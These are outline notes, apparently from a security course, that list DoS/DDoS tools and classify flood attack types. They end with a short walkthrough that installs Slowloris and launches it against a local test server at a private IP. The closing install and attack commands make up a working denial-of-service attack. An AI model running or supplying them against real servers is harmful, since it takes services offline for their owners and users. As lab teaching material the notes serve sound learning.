DoS and DDoS tools
1: UDP Unicorn.
2: Hping.
3: GoldenEye.
4: Low Orbit Ion Cannon (LOIC).
5: High Orbit Ion Cannon (HOIC).
6: Xerxes.
7: Slowloris.
What is DoS and DDoS Attack | Power and Technique of DoS/DDoS Attack?
What is DoS?
1: Denial-of-Service.
2: Computer or Networks.
3: Reduce.
4: Restricts.
5: Prevents.
6: Accessibility of system resources – legitimate users.
7: Flooding of Requests or traffic.
8: Overloading Resources.
What is DDoS?
Distributed Denial-of-Service
1: Multitude of Compromised Systems (Botnet).
2: More Powerful.
Basic Categories of DoS/DDoS Attack Vectors
Volumetric Attacks (bps):
1: UDP Flood Attack.
2: ICMP Flood Attack.
3: Ping of Death and Smurf Attack.
4: Pulse Wave and Zero-Day Attack.
Protocol Attacks (pps):
1: Syn Flood Attack.
2: Fragmentation Attack
3: Spoofed Session Flood Attack
4: ACK Flood Attack
Application Layer Attack (rps):
1: HTTP GET/POST attack.
2: Slowloris Attack.
3: UDP Application Layer Flood Attack.
Taking down Web Servers with Slowloris | Low and Slow Denial of Service
1: Open the Command Prompt.
2: Use XAMPP Server for testing.
Website: https://www.apachefriends.org/
3: Install Python.
Website: https://www.python.org/downloads/
4: Install Slowloris in the Command Prompt.
Command: pip install slowloris
5: Start the attack. Command: slowloris -s 500 -p 80 192.168.43.26